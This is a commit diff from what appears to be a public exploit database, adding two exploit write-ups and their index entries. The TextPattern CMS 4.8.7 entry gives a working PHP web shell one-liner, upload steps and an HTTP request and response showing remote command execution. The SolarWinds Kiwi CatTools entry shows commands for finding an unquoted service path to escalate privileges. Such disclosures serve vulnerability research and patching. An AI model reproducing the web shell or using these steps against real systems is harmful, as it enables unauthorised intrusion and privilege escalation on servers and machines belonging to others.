DB: 2021-10-15

2 changes to exploits/shellcodes SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
2021-10-15 05:02:17 +00:00 · 2021-10-15 05:02:17 +00:00 · 3e8f9f4d30
commit 3e8f9f4d30
parent 679a62755b
3 changed files with 83 additions and 0 deletions
--- a/exploits/php/webapps/50415.txt
+++ b/exploits/php/webapps/50415.txt
@ -0,0 +1,43 @@
 # Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
 # Date: 2021/09/06
 # Exploit Author: Mert Daş merterpreter@gmail.com
 # Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
 # Software web: https://textpattern.com/
 # Tested on: Server: Xampp
 First of all we should use file upload section to upload our shell.
 Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
 1) Go to content section .
 2) Click Files and upload malicious php file.
 3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
 After upload our file , our request and response is like below :
 Request:
 GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
 Gecko/20100101 Firefox/89.0
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Connection: close
 Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
 PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
 Upgrade-Insecure-Requests: 1
 Response:
 HTTP/1.1 200 OK
 Date: Thu, 10 Jun 2021 00:32:41 GMT
 Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
 X-Powered-By: PHP/7.4.20
 Content-Length: 22
 Connection: close
 Content-Type: text/html; charset=UTF-8
 pc\mertdas
--- a/exploits/windows/local/50416.txt
+++ b/exploits/windows/local/50416.txt
@ -0,0 +1,38 @@
 # Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path
 # Exploit Author: Mert DAŞ
 # Version: 3.11.8
 # Date: 14.10.2021
 # Vendor Homepage: https://www.solarwinds.com/
 # Tested on: Windows 10
 # Step to discover Unquoted Service Path :
 --------------------------------------
 C:\Users\Mert>sc qc CatTools
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: CatTools
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\CatTools3\nssm.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : CatTools
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 ---------------------------------------------
 Or:
 -------------------------
 C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
 /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
 ----------------------
 #Exploit:
 A successful attempt would require the local user to be able to insert
 their code in the system root path undetected by the OS or other security
 applications where it could potentially be executed during application
 startup or reboot. If successful, the local user's code would execute with
 the elevated privileges of the application.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11348,6 +11348,7 @@ id,file,description,date,author,type,platform,port
 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -42672,6 +42673,7 @@ id,file,description,date,author,type,platform,port
 47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php,
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp,
 50415,exploits/php/webapps/50415.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80
 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80